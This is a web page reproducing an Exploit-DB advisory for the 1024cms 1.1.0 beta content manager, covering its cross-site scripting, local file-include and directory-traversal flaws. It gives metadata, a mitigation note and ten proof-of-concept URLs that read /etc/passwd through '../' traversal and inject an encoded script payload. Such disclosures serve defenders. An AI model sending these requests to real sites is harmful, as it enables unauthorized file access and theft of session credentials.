header-logo
Suggest Exploit
vendor:
1024cms
by:
Unknown
7.5
CVSS
HIGH
Cross-site scripting, Local file-include, Directory-traversal
79, 98, 22
CWE
Product Name: 1024cms
Affected Version From: 1.1.0 beta
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:1024cms:1024cms:1.1.0
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Multiple vulnerabilities in 1024cms

The 1024cms application is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability. An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser, steal authentication credentials, and access sensitive information.

Mitigation:

Apply the latest security patches and updates provided by the vendor. Implement input validation and sanitization techniques to prevent cross-site scripting and directory-traversal attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47282/info

1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information.

1024cms 1.1.0 beta is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

Navigation

Suggest Exploit

Services By CQR